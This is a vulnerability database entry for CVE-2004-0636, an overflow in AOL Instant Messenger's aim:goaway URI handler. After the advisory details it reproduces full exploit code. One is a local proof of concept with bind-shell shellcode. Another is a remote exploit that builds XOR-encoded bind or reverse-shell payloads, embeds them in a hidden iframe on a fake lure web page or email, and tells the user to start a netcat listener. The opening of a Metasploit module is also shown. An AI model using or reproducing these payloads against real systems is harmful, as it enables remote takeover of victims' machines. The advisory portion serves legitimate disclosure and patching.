CVE-2004-0636
CVSS10.0
Published: 2004-11-23 00:00:00
Revised: 2008-09-10 15:27:04

[原文]Buffer overflow in the goaway function in the aim:goaway URI handler for AOL Instant Messenger (AIM) 5.5, including 5.5.3595, allows remote attackers to execute arbitrary code via a long Away message.


[CNNVD] AOL Instant Messenger Away Message Buffer Overflow Vulnerability (CNNVD-200411-135)

        
        AOL Instant Messenger is an online instant messaging client.
        AOL performs no proper bounds checking when handling 'aim://' URLs. A remote attacker can exploit this by crafting a malicious link and enticing a user to open it, executing arbitrary instructions on the system with the privileges of the process.
        An attacker builds an 'aim://goaway?message' URL containing more than 1024 bytes and entices an AIM user to process it, triggering a buffer overflow; carefully crafted URI data may then execute arbitrary instructions on the system with the privileges of the current user.
        

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/a:aol:instant_messenger:5.5
cpe:/a:aol:instant_messenger:5.5.3415_beta
cpe:/a:aol:instant_messenger:5.5.3595

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0636
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0636
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-135
(official data source) CNNVD

- Other links and resources

http://www.kb.cert.org/vuls/id/735966
(UNKNOWN)  CERT-VN  VU#735966
http://www.idefense.com/application/poi/display?id=121&type=vulnerabilities
(VENDOR_ADVISORY)  MISC  http://www.idefense.com/application/poi/display?id=121&type=vulnerabilities
http://secunia.com/advisories/12198/
(VENDOR_ADVISORY)  SECUNIA  12198
http://xforce.iss.net/xforce/xfdb/16926
(UNKNOWN)  XF  aim-away-bo(16926)

- Vulnerability information

AOL Instant Messenger Away Message缓冲区溢出漏洞
Critical  Boundary condition error
2004-11-23 00:00:00 2005-10-20 00:00:00
Remote

- Advisories and patches

        Vendor patch:
        AOL
        ---
        The vendor has fixed this security issue in version 5.9 and later; download the latest AIM program from the vendor's homepage:
        
        http://www.aim.com/

- Vulnerability information (395)

AOL Instant Messenger AIM "Away" Message Local Exploit (EDBID:395)
windows local
2004-08-14 Verified
0 mandragore
/*

subject:    local PoC exploit for AIM 5.5.3595

vendor:     http://www.aim.com
cve:          http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0636
credits:      Matt Murphy
date:        10 August 2004

notes:      exploits localy if an argument is supplied, otherwise prints the url.
            offsets are based on exe/dll provided in the package, so it should be NT universal. 
            shellcode makes a bindshell on port 1180.

greets:     roSec - Romanian Security Research - www rosec info

author:     mandragore

*/


#include <stdio.h>
#include <windows.h>
#include <winsock.h>
#pragma comment(lib,"ws2_32.lib")

#define GPA 0x004040a4
#define LLA 0x00404088

#define fatal(x) { perror(x); exit(1); }

unsigned char bsh[]={
0xEB,0x0F,0x8B,0x34,0x24,0x33,0xC9,0x80,0xC1,0xB0,0x80,0x36,0xDE,0x46,0xE2,0xFA,
0xC3,0xE8,0xEC,0xFF,0xFF,0xFF,0xBA,0x57,0xD7,0x60,0xDE,0xFE,0x9E,0xDE,0xB6,0xED,
0xEC,0xDE,0xDE,0xB6,0xA9,0xAD,0xEC,0x81,0x8A,0x21,0xCB,0xDA,0xFE,0x9E,0xDE,0x49,
0x47,0x8C,0x8C,0x8C,0x8C,0x9C,0x8C,0x9C,0x8C,0xB4,0x90,0x89,0x21,0xC8,0x21,0x0E,
0x4D,0xB4,0xDE,0xB6,0xDC,0xDE,0xDA,0x42,0x55,0x1A,0xB4,0xCE,0x8E,0x8D,0xB4,0xDC,
0x89,0x21,0xC8,0x21,0x0E,0xB4,0xDF,0x8D,0xB4,0xD3,0x89,0x21,0xC8,0x21,0x0E,0xB4,
0xDE,0x8A,0x8D,0xB4,0xDF,0x89,0x21,0xC8,0x21,0x0E,0x55,0x06,0xED,0x1E,0xB4,0xCE,
0x87,0x55,0x22,0x89,0xDD,0x27,0x89,0x2D,0x75,0x55,0xE2,0xFA,0x8E,0x8E,0x8E,0xB4,
0xDF,0x8E,0x8E,0x36,0xDA,0xDE,0xDE,0xDE,0xBD,0xB3,0xBA,0xDE,0x8E,0x36,0xD1,0xDE,
0xDE,0xDE,0x9D,0xAC,0xBB,0xBF,0xAA,0xBB,0x8E,0xAC,0xB1,0xBD,0xBB,0xAD,0xAD,0x9F,
0xDE,0x18,0xD9,0x9A,0x19,0x99,0xF2,0xDF,0xDF,0xDE,0xDE,0x5D,0x19,0xE6,0x4D,0x75,
0x75,0x75,0xBA,0xB9,0x7F,0xEE,0xDE,0x55,0x9E,0xD2,0x55,0x9E,0xC2,0x55,0xDE,0x21,
0xAE,0xD6,0x21,0xC8,0x21,0x0E
};

char *uri="aim:goaway?message=";

unsigned char smalljmp[]={ 0xeb, 0x08 };

void client2serv(unsigned int s) {
	char buff[4096];

	for (;;) {
		fgets(buff,4096,stdin);
		send(s,buff,strlen(buff),0);
	}
}

void sh() {
	int ret;
	long s;
	WSADATA wsa;
	struct sockaddr_in sin;
	char buff[4096];
	fd_set fds;
	long host=0x0100007f;

	WSAStartup(0x202,&wsa);

	sin.sin_family=2;
	sin.sin_port=htons(1180);
	sin.sin_addr = *(struct in_addr *)&host;

	s=socket(2,1,6);
	if ( ret=connect(s,(struct sockaddr *)&sin,16) != 0) {
		fatal("[-] damn.. it looks like it failed\n");
	} else
		printf("[+] connected.\n\n");

	CreateThread(0,0,(void *)client2serv,(long *)s,0,0);

	for (;;) {
		FD_ZERO(&fds);
		FD_SET(s,&fds);

        if (select(s+1, &fds, NULL, NULL, NULL) < 0)
			fatal("[-] shell.select()");

		if (FD_ISSET(s,&fds)) {
			if ( (ret = recv(s,buff,4096,0)) < 1 )
				fatal("[-] shell.recv()");
			memset(buff+ret,0,1);
			printf("%s",buff);
		}
	}

}

void fixsh() {
	int gpa=GPA^0xdededede, lla=LLA^0xdededede;
	memcpy(bsh+0x1a,&gpa,4);
	memcpy(bsh+0x2b,&lla,4);
}

int main(int argc, char **argv) {
	char *t;
	int retaddr=0x10015599; // call ebx from rtvideo.dll, should be stable

	fixsh();

	t=GlobalAlloc(0x40,2000);
	memset(t,0x41,1500);
	strncpy(t,uri,strlen(uri));
	memcpy(t+1037-4,&smalljmp,2);
	memcpy(t+1037,&retaddr,4);
	memcpy(t+1037+4+4,&bsh,sizeof(bsh));

	if (argc==1) {
		printf("%s\n",t);
		return 0;
	}

	printf("[+] sending request..\n");

	ShellExecute(0,"open",t,0,0,SW_SHOW);

	printf("[%%] let's sleep 5secs..\n");
	
	Sleep(5000);

	sh();

	return 0;
}

// milw0rm.com [2004-08-14]
		

- Vulnerability information (431)

AOL Instant Messenger AIM "Away" Message Remote Exploit (EDBID:431)
windows remote
2004-09-02 Verified
0 John Bissell
/* CAN-2004-0636 */

/*
 * AIM Away Message Buffer Overflow Exploit
 *   Exploit by John Bissell A.K.A. HighT1mes
 *
 * Exploit: 
 * ========
 *   drizzit.c
 *
 * Vulnerable Software:
 * ====================
 *    - AIM 5.5.3588
 *    - AIM 5.5.3590 Beta
 *    - AIM 5.5.3591
 *    - AIM 5.5.3595
 *    and a couple others versions...
 *
 * If you want to try other return addressees for other versions of
 * AIM then edit the return address.. But the current one embedded 
 * will work for sure with all the AIM versions listed above.
 *
 * I used some of the metasploit shellcode for this exploit with some
 * modifications to get this into stealth mode so it is harder to 
 * detect the attack. Since I'm using metasploit shellcode that means this
 * exploit can be used on any NT type OS, like win2k, winnt, winxp across
 * any service pack.. I don't know about SP2 though I haven't tested
 * it yet.
 *
 * On a side note I pourposly did not include the download+exec shellcode
 * even though I have it because I'm sick and tired of these little
 * spam/adware bitchs messing peoples computers up for profit.. You can
 * still download/upload through the shell to the victim. It just 
 * isn't automated like download+exec would be.
 *
 * In my opinion the reverse connect (-r option) is the most dangerous
 * because you can encode your ip address and pick a port, and then 
 * when the victim visits the evil web page or email whatever.. then the
 * attack will automatically open his AIM even its not already open and
 * connect to you and then terminate the AIM process to be stealth so
 * the victim doesn't know what him them.. As I remind people in the
 * exploit usage you need to remember to use netcat to listen on a 
 * port you picked for the exploit to connect to...
 *
 * One reason I decided to include the generation of html code for 
 * this exploit is I noticed almost no puts small limits on the 
 * <IFRAME SRC=""> attribute. So when the victim connects to that
 * page or reads that email depending on the browser or client, 
 * The exploit will execute.. IE 6.0 and Mozilla are 
 * affected by this problem as well as Outlook Express when the
 * security settings are set to the Internet Zone.
 *
 * Excuse the sloppy commandline interface I just wanted to get
 * this out to the public. 
 *
 * [ Original advisory posted by Secunia and iDEFENSE. ]
 *
 * Greets:
 * =======
 *   IsolationX, YpCat, DaPhire, route, #romhack,
 *   Taylor Hayes, Aria Giovanni, Anthony Rocha,
 *   InVerse, Deltaflame, Jenna Jameson, iDENFENSE, 
 *   secunia, so1o, John Kerry, and many others...
 *
 * Compiler: 
 * =========
 *    Visual C++ 6.0
 *
 * To compile you first must add ws2_32.lib to the Object/librarys modules:
 * text box under the Project -> Settings menu; then click on the link tab...
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

/* Exploit Data */

char injection_vector[] =

                        "\x61\x69\x6D\x3A\x67\x6F\x61\x77\x61\x79\x3F\x6D\x65\x73\x73\x61"
                        "\x67\x65\x3D\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
                        "\x41\x41\x41\x41\x41\x41\x41\x41";

char bind_shellcode[] = 

                        "\xEB\x26\x23\x38\x3B\x41\x41"
                        "\x92\x0f\x29\x12\x41\x41\x41\x41\xD9\xE1\xD9\x34\x24\x58\x58\x58"
                        "\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\x97\xFE\x80\x30\x92\x40\xE2"
                        "\xFA\x7A\xAA\x92\x92\x92\xD1\xDF\xD6\x92\x75\xEB\x54\xEB\x77\xDB"
                        "\x14\xDB\x36\x3F\xBC\x7B\x36\x88\xE2\x55\x4B\x9B\x67\x3F\x59\x7F"
                        "\x6E\xA9\x1C\xDC\x9C\x7E\xEC\x4A\x70\xE1\x3F\x4B\x97\x5C\xE0\x6C"
                        "\x21\x84\xC5\xC1\xA0\xCD\xA1\xA0\xBC\xD6\xDE\xDE\x92\x93\xC9\xC6"
                        "\x1B\x77\x1B\xCF\x92\xF8\xA2\xCB\xF6\x19\x93\x19\xD2\x9E\x19\xE2"
                        "\x8E\x3F\x19\xCA\x9A\x79\x9E\x1F\xC5\xBE\xC3\xC0\x6D\x42\x1B\x51"
                        "\xCB\x79\x82\xF8\x9A\xCC\x93\x7C\xF8\x98\xCB\x19\xEF\x92\x12\x6B"
                        "\x94\xE6\x76\xC3\xC1\x6D\xA6\x1D\x7A\x07\x92\x92\x92\xCB\x1B\x96"
                        "\x1C\x70\x79\xA3\x6D\xF4\x13\x7E\x02\x93\xC6\xFA\x93\x93\x92\x92"
                        "\x6D\xC7\xB2\xC5\xC5\xC5\xC5\xD5\xC5\xD5\xC5\x6D\xC7\x8E\x1B\x51"
                        "\xA3\x6D\xC5\xC5\xFA\x90\x92\xB0\x83\x1B\x74\xF8\x82\xC4\xC1\x6D"
                        "\xC7\x8A\xC5\xC1\x6D\xC7\x86\xC5\xC4\xC1\x6D\xC7\x82\x1B\x50\xF4"
                        "\x13\x7E\xC6\x92\x1F\xAE\xB6\xA3\x52\xF8\x87\xCB\x61\x39\x1B\x45"
                        "\x54\xD6\xB6\x82\xD6\xF4\x55\xD6\xB6\xAE\x93\x93\x1B\xEE\xB6\xDA"
                        "\x1B\xEE\xB6\xDE\x1B\xEE\xB6\xC2\x1F\xD6\xB6\x82\xC6\xC2\xC3\xC3"
                        "\xC3\xD3\xC3\xDB\xC3\xC3\x6D\xE7\x92\xC3\x6D\xC7\xA2\x1B\x73\x79"
                        "\x9C\xFA\x6D\x6D\x6D\x6D\x6D\xA3\x6D\xC7\xBE\xC5\x6D\xC7\x9E\x6D"
                        "\xC7\xBA\xC1\xC7\xC4\xC5\x19\xFE\xB6\x8A\x19\xD7\xAE\x19\xC6\x97"
                        "\xEA\x93\x78\x19\xD8\x8A\x19\xC8\xB2\x93\x79\x71\xA0\xDB\x19\xA6"
                        "\x19\x93\x7C\xA3\x6D\x6E\xA3\x52\x3E\xAA\x72\xE6\x95\x53\x5D\x9F"
                        "\x93\x55\x79\x60\xA9\xEE\xB6\x86\xE7\x73\x19\xC8\xB6\x93\x79\xF4"
                        "\x19\x9E\xD9\x19\xC8\x8E\x93\x79\x19\x96\x19\x93\x7A\x79\x90\xA3"
                        "\x52\x1B\x78\xCD\xCC\xCF\xC9\x50\x9A\x92\x65\x6D\x44\x58\x4F\x52";

char reverse_shellcode[] =
                         
                        "\xEB\x08\x41\x41\x92\x0f\x29\x12\x41\x41\x41\x41\xD9\xE1\xD9\x34"
                        "\x24\x58\x58\x58\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\xAC\xFE\x80"
                        "\x30\x92\x40\xE2\xFA\x7A\xA2\x92\x92\x92\xD1\xDF\xD6\x92\x75\xEB"
                        "\x54\xEB\x7E\x6B\x38\xF2\x4B\x9B\x67\x3F\x59\x7F\x6E\xA9\x1C\xDC"
                        "\x9C\x7E\xEC\x4A\x70\xE1\x3F\x4B\x97\x5C\xE0\x6C\x21\x84\xC5\xC1"
                        "\xA0\xCD\xA1\xA0\xBC\xD6\xDE\xDE\x92\x93\xC9\xC6\x1B\x77\x1B\xCF"
                        "\x92\xF8\xA2\xCB\xF6\x19\x93\x19\xD2\x9E\x19\xE2\x8E\x3F\x19\xCA"
                        "\x9A\x79\x9E\x1F\xC5\xB6\xC3\xC0\x6D\x42\x1B\x51\xCB\x79\x82\xF8"
                        "\x9A\xCC\x93\x7C\xF8\x9A\xCB\x19\xEF\x92\x12\x6B\x96\xE6\x76\xC3"
                        "\xC1\x6D\xA6\x1D\x7A\x1A\x92\x92\x92\xCB\x1B\x96\x1C\x70\x79\xA3"
                        "\x6D\xF4\x13\x7E\x02\x93\xC6\xFA\x93\x93\x92\x92\x6D\xC7\x8A\xC5"
                        "\xC5\xC5\xC5\xD5\xC5\xD5\xC5\x6D\xC7\x86\x1B\x51\xA3\x6D\xFA\xDF"
                        "\xDF\xDF\xDF\xFA\x90\x92\xB0\x83\x1B\x73\xF8\x82\xC3\xC1\x6D\xC7"
                        "\x82\x17\x52\xE7\xDB\x1F\xAE\xB6\xA3\x52\xF8\x87\xCB\x61\x39\x54"
                        "\xD6\xB6\x82\xD6\xF4\x55\xD6\xB6\xAE\x93\x93\x1B\xCE\xB6\xDA\x1B"
                        "\xCE\xB6\xDE\x1B\xCE\xB6\xC2\x1F\xD6\xB6\x82\xC6\xC2\xC3\xC3\xC3"
                        "\xD3\xC3\xDB\xC3\xC3\x6D\xE7\x92\xC3\x6D\xC7\xBA\x1B\x73\x79\x9C"
                        "\xFA\x6D\x6D\x6D\x6D\x6D\xA3\x6D\xC7\xB6\xC5\x6D\xC7\x9E\x6D\xC7"
                        "\xB2\xC1\xC7\xC4\xC5\x19\xFE\xB6\x8A\x19\xD7\xAE\x19\xC6\x97\xEA"
                        "\x93\x78\x19\xD8\x8A\x19\xC8\xB2\x93\x79\x71\xA0\xDB\x19\xA6\x19"
                        "\x93\x7C\xA3\x6D\x6E\xA3\x52\x3E\xAA\x72\xE6\x95\x53\x5D\x9F\x93"
                        "\x55\x79\x60\xA9\xEE\xB6\x86\xE7\x73\x19\xC8\xB6\x93\x79\xF4\x19"
                        "\x9E\xD9\x19\xC8\x8E\x93\x79\x19\x96\x19\x93\x7A\x79\x90\xA3\x52"
                        "\x1B\x78\xCD\xCC\xCF\xC9\x50\x9A\x92\x65\x6D\x44\x58\x4F\x52";

/* Function Prototypes */

void print_usage(char *prog_name);
unsigned char xor_data(unsigned char byte);

/* Function Code */

int main(int argc, char *argv[])
{
	int i                           = 0;
	int raw_num                     = 0;
	unsigned long port              = 1337; /* default port for bind and reverse attacks
*/
	unsigned long encoded_port      = 0;
	unsigned long encoded_ip        = 0;
	unsigned char print_raw_exploit = 0;
	unsigned char attack_mode       = 2;    /* bind attack by default */
	char ip_addr[256];
	char exploit[2048];
	char str_num[16];
	char *p1, *p2;
	FILE *EXPLOIT_FP;
	char outfile[512];
	WSADATA wsa;




	if (argc < 2) print_usage(argv[0]);

	/* process commandline */
	for (i = 0; i < argc; i++) {
		if (argv[i][0] == '-') {
			switch (argv[i][1]) {
			case 'r':
				/* reverse connect */
				strncpy(ip_addr, argv[i+1], 20);
				attack_mode = 1;
				break;
			case 'b':
				/* bind */
				attack_mode = 2;
				break;
			case 'p':
				port = atoi(argv[i+1]);
				/* port */
				break;
			case 'o':
				print_raw_exploit = 1;
				break;
			case 'e':
				strncpy(outfile, argv[i+1], 256);
			}
		}
	}

  /* initialize the socket library */
  if (WSAStartup(MAKEWORD(1, 1), &wsa) == SOCKET_ERROR) {
    printf("Error: Winsock didn't initialize!\n");
    exit(-1);
  }

	/* build exploit */
	strncpy(exploit, injection_vector, strlen(injection_vector));
	exploit[strlen(injection_vector)+1]=0; // tack on NULL byte
	encoded_port = htonl(port);
	encoded_port += 2;
	if (attack_mode == 1) {
		/* reverse connect attack */
		reverse_shellcode[196] = (char) 0x90;
     	reverse_shellcode[197] = (char) 0x92;
		reverse_shellcode[198] = xor_data((char)((encoded_port >> 16) & 0xff));
		reverse_shellcode[199] = xor_data((char)((encoded_port >> 24) & 0xff));

		p1 = strchr(ip_addr, '.');
		strncpy(str_num, ip_addr, p1-ip_addr);
		raw_num = atoi(str_num);
		reverse_shellcode[191] = xor_data((char)raw_num);

		p2 = strchr(p1+1, '.');
		strncpy(str_num, ip_addr+(p1-ip_addr)+1, p2-p1);
		raw_num = atoi(str_num);
		reverse_shellcode[192] = xor_data((char)raw_num);

		p1 = strchr(p2+1, '.');
		strncpy(str_num, ip_addr+(p2-ip_addr)+1, p1-p2);
		raw_num = atoi(str_num);
		reverse_shellcode[193] = xor_data((char)raw_num);

		p2 = strrchr(ip_addr, '.');
		strncpy(str_num, p2+1, 5);
		raw_num = atoi(str_num);
		reverse_shellcode[194] = xor_data((char)raw_num);

		strncat(exploit, reverse_shellcode, sizeof(reverse_shellcode));
	}
	if (attack_mode == 2) {
		/* bind attack */
		bind_shellcode[204] = (char) 0x90;
     	bind_shellcode[205] = (char) 0x92;
		bind_shellcode[206] = xor_data((char)((encoded_port >> 16) & 0xff));
		bind_shellcode[207] = xor_data((char)((encoded_port >> 24) & 0xff));
		strncat(exploit, bind_shellcode, sizeof(bind_shellcode));
	}

	WSACleanup();

	/* output exploit */
	if (print_raw_exploit == 1) {
		printf("%s", exploit);
	}
	else {
		if ((EXPLOIT_FP = fopen(outfile, "w")) == NULL) {
			fprintf(stderr, "Error: Exploit file can't be created!\n");
			exit(-1);
		}

		fprintf(EXPLOIT_FP, "<html>\n");
		fprintf(EXPLOIT_FP, "<head>\n");
		fprintf(EXPLOIT_FP, "<title>Hey d00d!</title>\n");
		fprintf(EXPLOIT_FP, "</head>\n");
		fprintf(EXPLOIT_FP, "<body>\n");
		fprintf(EXPLOIT_FP, "Some fake web page or email...\n");
		fprintf(EXPLOIT_FP, "<iframe width=0 height=0 border=0 src=\"");
		fprintf(EXPLOIT_FP, "%s", exploit);
		fprintf(EXPLOIT_FP, "\">\n</iframe>\n");
		fprintf(EXPLOIT_FP, "</body>\n");
		fprintf(EXPLOIT_FP, "<html>\n");

		fclose(EXPLOIT_FP);

		/* im to lazy to make a macro for this banner :P */
		printf(" +-------------------------------------------------+\n");
		printf(" |  AIM Exploit by John Bissell A.K.A. HighT1mes   |\n");
		printf(" |    AIM Away Message Buffer Overflow Exploit     |\n");
		printf(" +-------------------------------------------------+\n\n");

		printf(" Exploit created!\n\n");

		printf(" Remember if you use the -r option to have netcat listening\n");
		printf(" on the port you are using for the attack so the victim will\n");
		printf(" be able to connect to you when exploited...\n\n");
		printf(" Example:\n");
		printf("\tnc.exe -l -p %d", port);
	}

	return(EXIT_SUCCESS);
}

void print_usage(char *prog_name)
{
	printf(" +-------------------------------------------------+\n");
	printf(" |  AIM Exploit by John Bissell A.K.A. HighT1mes   |\n");
	printf(" |    AIM Away Message Buffer Overflow Exploit     |\n");
	printf(" +-------------------------------------------------+\n\n");
	printf(" Exploit Usage:\n");
	printf("\t%s -r your_ip | -b [-p port] -o | -e outfile\n\n", prog_name);
	printf(" Parameters:\n");
	printf("\t-r your_ip or -b\t Choose -r for reverse connect attack mode\n\t\t\t\t
and choose -b for a bind attack. By default\n\t\t\t\t if you don't specify -r or
-b then a bind\n\t\t\t\t attack will be generated.\n\n");
	printf("\t-p (optional)\t\t This option will allow you to change the port \n\t\t\t\t
used for a bind or reverse connect attack.\n\t\t\t\t If the attack mode is bind
then  the\n\t\t\t\t victim will open the -p port. If the attack\n\t\t\t\t mode
is reverse connect  then the port you\n\t\t\t\t specify will be the one you want
to listen\n\t\t\t\t on so the victim can  connect to you\n\t\t\t\t right away.\n\n");
	printf("\t-o or -e outfile\t\t Here you specify the output method...\n\t\t\t\t If
you would like output go straight to\n\t\t\t\t standerd output then specify the
-o option\n\t\t\t\t otherwise give the path of where you want to\n\t\t\t\t create
the exploit file which is basically\n\t\t\t\t a simple html file. The -o option
is useful if\n\t\t\t\t you want to test the exploit url in\n\t\t\t\t different
ways.\n\n");
	printf(" Examples:\n");
	printf("\t%s -r 68.6.47.62 -p 8888 -e c:\\exploit.html\n", prog_name);
	printf("\t%s -b -p 1542 -e c:\\new_exploit.html\n", prog_name);
	printf("\t%s -b -o\n", prog_name);
	printf("\t%s -r 68.6.47.62 -o\n\n", prog_name);
	printf(" Remember if you use the -r option to have netcat listening\n");
	printf(" on the port you are using for the attack so the victim will\n");
	printf(" be able to connect to you when exploited...\n\n");
	printf(" Example:\n");
	printf("\tnc.exe -l -p 8888");
	exit(-1);
}

unsigned char xor_data(unsigned char byte)
{
	return(byte ^ 0x92);
}

// milw0rm.com [2004-09-02]
		

- Vulnerability information (16525)

AOL Instant Messenger goaway Overflow (EDBID:16525)
windows remote
2010-07-03 Verified
0 metasploit
##
# $Id: aim_goaway.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	#
	# This module acts as an HTTP server and exploits an SEH overwrite
	#
	include Msf::Exploit::Seh
	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'AOL Instant Messenger goaway Overflow',
			'Description'    => %q{
					This module exploits a flaw in the handling of AOL Instant
				Messenger's 'goaway' URI handler.  An attacker can execute
				arbitrary code by supplying a overly sized buffer as the
				'message' parameter.  This issue is known to affect AOL Instant
				Messenger 5.5.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'skape',
